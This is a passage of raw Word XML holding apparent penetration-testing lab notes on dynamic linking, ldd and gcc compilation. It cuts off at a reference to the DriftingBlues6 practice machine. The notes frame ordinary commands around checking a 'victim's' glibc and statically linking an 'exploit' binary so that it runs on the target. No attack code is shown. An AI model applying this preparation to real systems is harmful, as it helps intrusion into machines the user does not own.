      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libc.so.6:printf.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003662">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003663">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are how </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic linking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">works. Your executable is small because it says "at runtime, go load these .so files and wire up the missing pieces."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003664">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The executables are small UNLESS you use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag which tell the compiler to copy all the needed libc code directly into the binary at build time, making it huge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003665">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003666">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003667">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ul4xikvd3qie" w:id="487"/>
      <w:bookmarkEnd w:id="487"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003668">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003669">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd = List Dynamic Dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check what libraries a binary needs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows all .so files the binary will try to load at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it prints not a dynamic executable, you know it’s statically linked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003670">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check victim’s glibc version indirectly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003671">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003672">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prints the version of glibc installed (since ldd is part of glibc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: ldd (Ubuntu GLIBC 2.31-0ubuntu9.9) 2.31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003674">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003675">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect a known system binary to confirm libc path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003676">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /bin/ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003677">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows where libc.so.6 is coming from. Useful if multiple versions exist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003678">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003679">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debug a broken binary with missing libs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see errors like:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libfoo.so.1 =&gt; not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means the required shared lib isn’t installed or isn’t in the library path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is exactly how you’d detect dependency issues before running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm static linking worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003680">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After building with -static:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003681">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should print: not a dynamic executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003683">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s your confirmation the victim’s glibc won’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003684">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003685">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003686">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003687">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd is basically a front end to the dynamic loader (ld-linux). If you want more control, you can invoke the loader directly:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib64/ld-linux-x86-64.so.2 --list ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003689">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="999"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This does the same thing, but bypasses some ldd limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368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68C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rhuryag18u44" w:id="488"/>
      <w:bookmarkEnd w:id="488"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to compile C program (use .c files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc nameOfFile.c -o outputFileName</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can specify the name that you want the executable to called by using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003690">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't specify, you will likely get a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a.out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003691">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003692">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1149">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DriftingBlues6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
